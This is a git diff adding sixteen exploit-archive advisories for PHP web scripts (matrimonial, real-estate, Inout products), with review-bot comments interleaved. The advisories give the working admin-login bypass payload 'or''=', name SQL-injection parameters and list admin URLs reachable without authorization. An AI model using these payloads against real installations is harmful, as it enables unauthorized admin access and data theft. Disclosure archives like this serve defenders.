diff --git a/files.csv b/files.csv
index 03c2cc7e0..d03e74990 100644
--- a/files.csv
+++ b/files.csv
@@ -36981,3 +36981,19 @@ id,file,description,date,author,platform,type,port
 41037,platforms/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
 41038,platforms/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
 41040,platforms/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",linux,webapps,0
+41043,platforms/php/webapps/41043.txt,"My Private Tutor Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41044,platforms/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41045,platforms/php/webapps/41045.txt,"Just Dial Marketplace Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41046,platforms/php/webapps/41046.txt,"Entrepreneur Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41047,platforms/php/webapps/41047.txt,"Open Source Real-Estate Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0
+41048,platforms/php/webapps/41048.txt,"Inout StickBoard 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41049,platforms/php/webapps/41049.txt,"Inout Search Engine Ultimate Edition 7.0/8.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41050,platforms/php/webapps/41050.txt,"Inout Webmail Ultimate Edition 4.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41051,platforms/php/webapps/41051.txt,"Inout SmartDeal 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41052,platforms/php/webapps/41052.txt,"Inout QuerySpace 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41053,platforms/php/webapps/41053.txt,"Inout CareerLamp 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41054,platforms/php/webapps/41054.txt,"Inout SocialTiles 2.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41055,platforms/php/webapps/41055.txt,"Inout Celebrities 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41056,platforms/php/webapps/41056.txt,"Education Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41058,platforms/php/webapps/41058.txt,"Professional Service Booking Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0
+41059,platforms/php/webapps/41059.txt,"Courier Business Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/41043.txt b/platforms/php/webapps/41043.txt
new file mode 100755
index 000000000..f27e66189
--- /dev/null
+++ b/platforms/php/webapps/41043.txt
@@ -0,0 +1,12 @@
+# # # # #
+# Vulnerability: Admin Login Bypass & SQLi
+# Date: 13.01.2017
+# Vendor Homepage: http://scriptfirm.com/
+# Script Name: Professional Service Booking Script
+# Script Buy Now: My Private Tutor Website
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41044.txt b/platforms/php/webapps/41044.txt
new file mode 100755
index 000000000..5dca3da8a
--- /dev/null
+++ b/platforms/php/webapps/41044.txt
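Review bot: The header of 41043.txt does not match its index entry: files.csv titles it "My Private Tutor Website Script", but the `# Script Name:` line reads "Professional Service Booking Script" (the product covered by 41058.txt), and `# Script Buy Now:` holds a product name where the other advisories in this commit carry a URL. Anyone matching the advisory to an installed product will be pointed at the wrong one. I would change the two lines to `# Script Name: My Private Tutor Website Script` and `# Script Buy Now: <vendor product URL>`, with the URL supplied by the author since it is not visible in this diff.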
@@ -0,0 +1,29 @@
+# # # # #
+# Vulnerability:: Admin Login Bypass & SQLi + Add/Edit
+# Date: 13.01.2017
+# Vendor Homepage: http://www.phpmatrimonialscript.in/
+# Script Name: Hindu Matrimonial Script
+# Script Buy Now: http://www.phpmatrimonialscript.in/product/hindu-matrimonial-script/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+#
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+#
+# Direct entrance Add/Edit...
+# http://localhost/[PATH]/admin/usermanagement.php
+# http://localhost/[PATH]/admin/countrymanagement.php
+# http://localhost/[PATH]/admin/communitymanagement.php
+# http://localhost/[PATH]/admin/renewaldue.php
+# http://localhost/[PATH]/admin/generalsettings.php
+# http://localhost/[PATH]/admin/cms.php
+# http://localhost/[PATH]/admin/cms.php
+# http://localhost/[PATH]/admin/newsletter1.php
+# http://localhost/[PATH]/admin/payment.php
+# http://localhost/[PATH]/admin/searchview.php
+# http://localhost/[PATH]/admin/success_story.php
+# http://localhost/[PATH]/admin/featured.php
+# http://localhost/[PATH]/admin/photo.php
+# http://localhost/[PATH]/admin/googleads.php
+# http://localhost/[PATH]/admin/reports.php
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41045.txt b/platforms/php/webapps/41045.txt
new file mode 100755
index 000000000..e1358bc52
--- /dev/null
+++ b/platforms/php/webapps/41045.txt
@@ -0,0 +1,12 @@
+# # # # #
+# Vulnerability: Admin Login Bypass & SQLi
+# Date: 13.01.2017
+# Vendor Homepage: http://scriptfirm.com/
+# Script Name: Just Dial Marketplace Script
+# Script Buy Now: http://scriptfirm.com/just-dial-marketplace
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # #
\ No newline at end of file
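Review bot: The "Direct entrance Add/Edit..." list in 41044.txt does not say whether those admin pages respond without a logged-in session, so a reader cannot tell a missing per-page authorization check from a consequence of the login bypass described just above it. `admin/cms.php` is also listed twice. I would drop the duplicate and add one line before the list, for example `# The pages below were reachable without an authenticated admin session:`, if that is what was observed. The header line has a doubled colon (`# Vulnerability::`), as do 41046.txt and 41056.txt.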
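Review bot: 41045.txt records no affected version and no root cause, only the input typed into the login form; the same holds for 41043, 41046, 41056 and 41059. A tautology accepted in both Username and Password suggests the login query is assembled by string concatenation, although the vendor code is not shown here. I would add `# Script Version: <version tested>` and a line such as `# Fix: bind the username as a query parameter and verify the stored password hash in application code`, so operators of these scripts can scope and remediate.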
diff --git a/platforms/php/webapps/41046.txt b/platforms/php/webapps/41046.txt
new file mode 100755
index 000000000..02c652e0f
--- /dev/null
+++ b/platforms/php/webapps/41046.txt
@@ -0,0 +1,12 @@
+# # # # #
+# Vulnerability:: Admin Login Bypass & SQLi
+# Date: 13.01.2017
+# Vendor Homepage: http://www.phpmatrimonialscript.in/
+# Script Name: Entrepreneur Matrimonial Script
+# Script Buy Now: http://www.phpmatrimonialscript.in/product/entrepreneur-matrimonial/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41047.txt b/platforms/php/webapps/41047.txt
new file mode 100755
index 000000000..d38f6deec
--- /dev/null
+++ b/platforms/php/webapps/41047.txt
@@ -0,0 +1,16 @@
+# # # # #
+# Vulnerability: SQL Injection + Admin Login Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://phprealestatescript.org/
+# Script Name: Open Source Real-Estate Script
+# Script Buy Now: http://phprealestatescript.org/open-source-real-estate-script.html
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/viewpropertydetails.php?id=[SQL]
+#
+# Admin Login Bypass
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41048.txt b/platforms/php/webapps/41048.txt
new file mode 100755
index 000000000..fa5751fc9
--- /dev/null
+++ b/platforms/php/webapps/41048.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout StickBoard Script
+# Script Version: v1.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-stickboard/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Direct entrance Add/Edit/Del...
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/account/clearcache
+# http://localhost/[PATH]/admin/account/changeprofileimage
+# http://localhost/[PATH]/admin/account/changepassword
+# http://localhost/[PATH]/admin/pin/websitepin
+# http://localhost/[PATH]/admin/user/manage
+# http://localhost/[PATH]/admin/user/userdetails/69
+# Vs.......
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41049.txt b/platforms/php/webapps/41049.txt
new file mode 100755
index 000000000..110739a6b
--- /dev/null
+++ b/platforms/php/webapps/41049.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout Search Engine Ultimate Edition Script
+# Script Version: v7.0, v8.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-search-engine/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/index.php?page=engine/manage_suggestion
+# http://localhost/[PATH]/admin/index.php?page=databaseengine/managesettings
+# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add
+# http://localhost/[PATH]/admin/index.php?page=seasonallogo/manage
+# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add
+# Vs.......
+# # # # #
\ No newline at end of file
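Review bot: 41048.txt labels the issue "Security Bypass" and lists admin URIs, but never states the condition under which they were requested or what the server returned; 41049 through 41055 follow the same template. Presumably the requests were made without an admin session, which would make this missing authorization on admin routes and would match the "Improper Access Restrictions" titles in files.csv. I would state that explicitly with a line such as `# Precondition: no authenticated admin session`, worded to match what was actually observed, and replace the trailing `# Vs.......` with `# etc.` if that is the intended meaning. 41049.txt also lists `page=seasonallogo/add` twice.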
diff --git a/platforms/php/webapps/41050.txt b/platforms/php/webapps/41050.txt
new file mode 100755
index 000000000..3b8e9159e
--- /dev/null
+++ b/platforms/php/webapps/41050.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout Webmail Ultimate Edition v4.0
+# Script Version: Ultimate Edition v4.0, Ultimate Hypertable Version
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-webmail/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/index.php?page=ads/sponsoredlinks
+# http://localhost/[PATH]/admin/index.php?page=todolist/todolist
+# http://localhost/[PATH]/admin/index.php?page=statistics/registration_showgraph
+# http://localhost/[PATH]/admin/index.php?page=statistics/showgraph
+# http://localhost/[PATH]/admin/index.php?page=statistics/accountactivity
+# http://localhost/[PATH]/admin/index.php?page=calendar/calendar
+# Vs.......
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41051.txt b/platforms/php/webapps/41051.txt
new file mode 100755
index 000000000..ad33d4d37
--- /dev/null
+++ b/platforms/php/webapps/41051.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout SmartDeal Script
+# Script Version: v1.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-smartdeal/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/index.php?page=account/changepassword
+# http://localhost/[PATH]/admin/index.php?page=country/addcountry
+# http://localhost/[PATH]/admin/index.php?page=account/addbank
+# Vs.......
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41052.txt b/platforms/php/webapps/41052.txt
new file mode 100755
index 000000000..f167977d7
--- /dev/null
+++ b/platforms/php/webapps/41052.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout QuerySpace Script
+# Script Version: v1.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-queryspace/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/user/search
+# Vs.......
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41053.txt b/platforms/php/webapps/41053.txt
new file mode 100755
index 000000000..3817441e0
--- /dev/null
+++ b/platforms/php/webapps/41053.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout CareerLamp Script
+# Script Version: v1.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-careerlamp/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/statistics/js_registration_showgraph
+# http://localhost/[PATH]/admin/statistics/accountactivity
+# http://localhost/[PATH]/admin/statistics/js_showgraph
+# Vs.......
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41054.txt b/platforms/php/webapps/41054.txt
new file mode 100755
index 000000000..f3b447ecd
--- /dev/null
+++ b/platforms/php/webapps/41054.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout SocialTiles Script
+# Script Version: v2.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-socialtiles/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/index.php?page=account/statussettings
+# http://localhost/[PATH]/admin/index.php?page=account/newad
+# Vs.......
+# # # # #
diff --git a/platforms/php/webapps/41055.txt b/platforms/php/webapps/41055.txt
new file mode 100755
index 000000000..5ac537348
--- /dev/null
+++ b/platforms/php/webapps/41055.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout Celebrities Script
+# Script Version: v1.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-celebrities/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/settings/managersssettings
+# http://localhost/[PATH]/admin/settings/addrsssettings
+# Vs.......
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41056.txt b/platforms/php/webapps/41056.txt
new file mode 100755
index 000000000..5afdf42ce
--- /dev/null
+++ b/platforms/php/webapps/41056.txt
@@ -0,0 +1,12 @@
+# # # # #
+# Vulnerability:: Admin Login Bypass & SQLi
+# Date: 13.01.2017
+# Vendor Homepage: http://scriptfirm.com/
+# Script Name: Education Website Script
+# Script Buy Now: http://scriptfirm.com/education-website
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41058.txt b/platforms/php/webapps/41058.txt
new file mode 100755
index 000000000..f50e34d7d
--- /dev/null
+++ b/platforms/php/webapps/41058.txt
@@ -0,0 +1,16 @@
+# # # # #
+# Vulnerability: Admin Login Bypass & SQLi
+# Date: 13.01.2017
+# Vendor Homepage: http://scriptfirm.com/
+# Script Name: Professional Service Booking Script
+# Script Buy Now: http://scriptfirm.com/professional-service-booking-engine
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/best_pro_details.php?service_id=[SQL]
+# http://localhost/[PATH]/content.php?page=[SQL]
+# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41059.txt b/platforms/php/webapps/41059.txt
new file mode 100755
index 000000000..156b9b96f
--- /dev/null
+++ b/platforms/php/webapps/41059.txt
@@ -0,0 +1,12 @@
+# # # # #
+# Vulnerability: Admin Login Bypass & SQLi
+# Date: 13.01.2017
+# Vendor Homepage: http://scriptfirm.com/
+# Script Name: Courier Business Website Script
+# Script Buy Now: http://scriptfirm.com/courier-business-website
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # #
\ No newline at end of file
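Review bot: The closing line of 41058.txt, `# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.`, is hard to parse and leaves the scope of the advisory open. I would reword it to `# The list is not exhaustive; other files appear to be affected as well.` The two `[SQL]` entries would also help someone fixing the script more if they named the handling at fault, for example `# service_id and page reach the query without parameter binding`, assuming that is what the author found. The files.csv title for this entry mentions only SQL injection, while the header here also claims an admin login bypass.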